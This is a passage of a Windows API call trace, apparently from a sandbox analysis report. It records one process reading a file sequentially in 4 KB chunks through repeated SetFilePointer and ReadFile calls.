lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.163] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x99000 [0081.163] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.164] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9a000 [0081.164] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.180] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9b000 [0081.180] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.180] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9c000 [0081.180] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.181] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9d000 [0081.181] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.181] SetFilePointer (in: 
hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9e000 [0081.182] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.182] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9f000 [0081.182] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.182] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa0000 [0081.182] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.184] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa1000 [0081.184] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.184] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa2000 [0081.184] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 
[0081.185] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa3000 [0081.185] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.185] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa4000 [0081.185] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.186] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa5000 [0081.186] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.186] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa6000 [0081.186] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.186] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa7000 [0081.187] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, 
lpOverlapped=0x0) returned 1 [0081.187] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa8000 [0081.187] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.188] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa9000 [0081.188] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.189] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xaa000 [0081.189] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.189] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xab000 [0081.189] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.190] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xac000 [0081.190] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, 
lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.190] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xad000 [0081.190] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.190] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xae000 [0081.191] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.191] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xaf000 [0081.191] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.192] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb0000 [0081.192] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.192] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb1000 [0081.192] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | 
out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.193] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb2000 [0081.193] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.193] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb3000 [0081.193] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.194] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb4000 [0081.194] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb5000 [0081.195] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb6000 [0081.195] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.196] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb7000 [0081.196] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.197] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb8000 [0081.197] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.197] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb9000 [0081.197] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.198] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xba000 [0081.198] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.198] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbb000 [0081.198] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.199] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbc000 [0081.199] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.199] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbd000 [0081.199] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.200] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbe000 [0081.200] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.200] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbf000 [0081.200] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.201] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc0000 [0081.201] ReadFile (in: 
hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.203] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc1000 [0081.203] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.203] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc2000 [0081.204] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.204] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc3000 [0081.204] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.204] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc4000 [0081.204] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.205] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc5000 
[0081.205] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.205] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc6000 [0081.205] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.206] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc7000 [0081.206] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.206] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc8000 [0081.206] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.206] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc9000 [0081.207] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.208] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xca000 [0081.208] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.208] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xcb000 [0081.208] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.209] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xcc000 [0081.209] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.209] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xcd000 [0081.209] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.210] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xce000 [0081.210] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.210] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, 
